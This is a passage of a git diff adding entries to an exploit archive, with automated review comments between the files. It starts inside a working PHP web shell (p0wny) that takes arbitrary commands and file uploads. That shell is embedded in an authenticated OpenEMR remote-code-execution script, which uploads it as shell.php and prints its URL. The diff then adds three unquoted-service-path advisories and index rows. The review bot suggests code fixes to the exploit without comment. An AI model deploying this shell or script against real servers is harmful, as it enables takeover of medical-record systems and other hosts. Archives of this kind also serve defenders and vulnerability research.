array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return 
array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n \n \n p0wny@shell:~#\n \n \n\n \n \n\n \n
\n
\n                
\n ___ ____ _ _ _ _ _ \n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| \n|_| |___/ \\____/ \n
\n
\n
\n \n
\n \n
\n
\n
\n \n\n\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_dest_filename\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_education\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"bn_save\"\r\n\r\nSave\r\n-----------------------------31900464228840324774249185339--\r\n" + +# Send Exploit: +session.post(exploit_url, headers=header, data=body) + +# Finish +path = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php' +print('[+] Webshell: ' + path) \ No newline at end of file diff --git a/exploits/windows/local/49997.txt b/exploits/windows/local/49997.txt new file mode 100644 index 000000000..4cf1fc37d --- /dev/null +++ b/exploits/windows/local/49997.txt 
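Review bot: None of the argparse options (`-T/--IP`, `-P/--PORT`, `-U/--PATH`, `-u/--USERNAME`, `-p/--PASSWORD`) is declared with `required=True`, so a missing option leaves `target_ip` or `target_port` as `None` and the script dies on `'http://' + target_ip + ':' + target_port` with a TypeError instead of a usage message; `my_parser.add_argument('-T', '--IP', type=str, required=True)` and the same for the other four fixes that. The login response `auth` and the result of the final `session.post(exploit_url, headers=header, data=body)` are never inspected, so `print('[+] Webshell: ' + path)` is printed even when authentication or the upload failed; checking `status_code` before announcing success would avoid a misleading result. `response = session.get(auth_chek_url)` is assigned and never used, and the first `header` literal sets `'Host': target_ip` without the port while every URL includes it, which deserves a comment if it is deliberate. The multipart body is one hand-built string literal that embeds a complete PHP shell; a short comment naming its origin and the boundary it must match would help anyone auditing what this script sends.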
@@ -0,0 +1,48 @@
+# Exploit Title: Spy Emergency 25.0.650 - Unquoted Service Path
+# Discovery by: Erick Galindo
+# Discovery Date: 2021-06-11
+# Vendor Homepage: https://www.spy-emergency.com/
+# Software Link: https://www.spy-emergency.com/download/download.php?id=1
+# Tested Version: 25.0.650.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+# Step to discover Unquoted Service Path:
+
+C:>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "SpyEmrg"| findstr /i /v """
+Spy Emergency Health Check SpyEmrgHealth C:\Program Files\NETGATE\Spy Emergency\SpyEmergencyHealth.exe Auto
+Spy Emergency Engine Service SpyEmrgSrv C:\Program Files\NETGATE\Spy Emergency\SpyEmergencySrv.exe Auto
+
+# Service info
+C:>sc qc "SpyEmrgHealth"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: SpyEmrgHealth
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\NETGATE\Spy Emergency\SpyEmergencyHealth.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Spy Emergency Health Check
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+# Service info
+
+C:\>sc qc "SpyEmrgSrv"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: SpyEmrgSrv
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\NETGATE\Spy Emergency\SpyEmergencySrv.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Spy Emergency Engine Service
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/exploits/windows/local/49999.txt b/exploits/windows/local/49999.txt
new file mode 100644
index 000000000..e812eaf68
--- /dev/null
+++ b/exploits/windows/local/49999.txt
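Review bot: The closing line `This vulnerability could permit executing code during startup or reboot with the escalated privileges.` states the impact without the precondition that makes an unquoted path exploitable: a local user must be able to create files in one of the directories the path is searched through (here `C:\Program Files\` or `C:\Program Files\NETGATE\`), and on a default Windows 10 install those are not writable by standard users. The advisory should record the ACLs of those directories (for example the `icacls` output) next to the `sc qc` output, so a reader can tell whether this is a working local privilege escalation or only a hardening finding. The same precondition is missing from 49999.txt and 50004.txt, which show the `wmic`/`sc qc` output only and never state an impact at all. The remediation is quoting the `NOMBRE_RUTA_BINARIO`/`BINARY_PATH_NAME` value so the service manager no longer searches intermediate paths; a one-line `# Fix:` note saying so would help defenders triaging these entries.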
@@ -0,0 +1,32 @@
+# Exploit Title: WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 13-06-2021
+# Vendor Homepage: https://www.wibu.com
+# Software Links: https://www.wibu.com/us/support/user/downloads-user-software/file/download/5792.html
+# Tested Version: 6.51
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+WIBU-KEY Server
+ WkSvW32.exe C:\PROGRAM FILES
+(X86)\WIBUKEY\SERVER\WkSvW32.exe
+ Auto
+
+C:\Users\IEUser>sc qc WkSvW32.exe
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: WkSvW32.exe
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\PROGRAM FILES
+(X86)\WIBUKEY\SERVER\WkSvW32.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : WIBU-KEY Server
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/50004.txt b/exploits/windows/local/50004.txt
new file mode 100644
index 000000000..5c1c6b258
--- /dev/null
+++ b/exploits/windows/local/50004.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 14-06-2021
+# Vendor Homepage: https://bitbucket.org/phjounin/tftpd64/src/master/
+# Software Links: https://bitbucket.org/phjounin/tftpd64/wiki/Download%20Tftpd64.md
+# Tested Version: 4.64
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+Tftpd32 service edition Tftpd32_svc C:\Program
+Files\Tftpd64_SE\tftpd64_svc.exe Auto
+
+C:\Users\IEUser>sc qc Tftpd32_svc
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Tftpd32_svc
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Tftpd64_SE\tftpd64_svc.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Tftpd32 service edition
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9660103c9..09daf1acb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6798,6 +6798,9 @@ id,file,description,date,author,type,platform,port
 49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",dos,windows,
 49978,exploits/ios/dos/49978.py,"Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",dos,ios,
 49979,exploits/ios/dos/49979.py,"n+otes 1.6.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",dos,ios,
+50001,exploits/ios/dos/50001.py,"Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)",2021-06-14,"Geovanni Ruiz",dos,ios,
+50002,exploits/ios/dos/50002.py,"Post-it 5.0.1 - Denial of Service (PoC)",2021-06-14,"Geovanni Ruiz",dos,ios,
+50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",2021-06-14,"Geovanni Ruiz",dos,ios,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11358,6 +11361,9 @@ id,file,description,date,author,type,platform,port
 49959,exploits/windows/local/49959.py,"IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP",2021-06-07,"Austin Babcock",local,windows,
 49966,exploits/windows/local/49966.py,"Backup Key Recovery 2.2.7 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",local,windows,
 49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",local,ios,
+49997,exploits/windows/local/49997.txt,"Spy Emergency 25.0.650 - 'Multiple' Unquoted Service Path",2021-06-14,"Erick Galindo",local,windows,
+49999,exploits/windows/local/49999.txt,"WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path",2021-06-14,"Brian Rodriguez",local,windows,
+50004,exploits/windows/local/50004.txt,"Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path",2021-06-14,"Brian Rodriguez",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
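Review bot: The new index row for 49997 titles the entry `Spy Emergency 25.0.650 - 'Multiple' Unquoted Service Path`, while the file's own header in this commit reads `# Exploit Title: Spy Emergency 25.0.650 - Unquoted Service Path`; the two should agree, since the CSV is what search and the site listing display. Either drop `'Multiple'` from the row or change the title line in 49997.txt, which does document two services (SpyEmrgHealth and SpyEmrgSrv), so the file header is the one that looks incomplete. The 49999 and 50004 rows in this hunk match their file headers.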
@@ -44145,3 +44151,11 @@ id,file,description,date,author,type,platform,port
 49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",2021-06-11,Luca.Chiou,webapps,multiple,
 49988,exploits/php/webapps/49988.txt,"Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)",2021-06-11,"Avinash R",webapps,php,
 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,
+49990,exploits/multiple/webapps/49990.txt,"Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)",2021-06-14,"Abdulazeez Alaseeri",webapps,multiple,
+49991,exploits/multiple/webapps/49991.txt,"Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)",2021-06-14,"Abdulazeez Alaseeri",webapps,multiple,
+49992,exploits/php/webapps/49992.py,"GLPI 9.4.5 - Remote Code Execution (RCE)",2021-06-14,"Brian Peters",webapps,php,
+49993,exploits/php/webapps/49993.txt,"COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS)",2021-06-14,"BHAVESH KAUL",webapps,php,
+49994,exploits/php/webapps/49994.txt,"Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)",2021-06-14,"Riadh Benlamine",webapps,php,
+49995,exploits/php/webapps/49995.txt,"Small CRM 3.0 - 'Authentication Bypass' SQL Injection",2021-06-14,"BHAVESH KAUL",webapps,php,
+49996,exploits/php/webapps/49996.txt,"TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)",2021-06-14,"Mert Daş",webapps,php,
+49998,exploits/php/webapps/49998.py,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)",2021-06-14,"Ron Jost",webapps,php,